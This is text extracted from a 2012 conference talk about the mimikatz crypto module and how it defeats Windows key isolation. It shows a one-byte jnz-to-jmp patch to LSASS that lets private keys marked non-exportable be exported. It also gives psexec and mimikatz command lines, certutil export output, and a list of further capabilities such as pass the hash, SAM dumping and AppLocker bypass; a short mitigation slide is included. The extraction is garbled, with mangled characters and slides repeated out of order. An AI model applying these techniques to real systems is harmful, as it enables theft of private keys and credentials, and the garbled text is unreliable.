07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
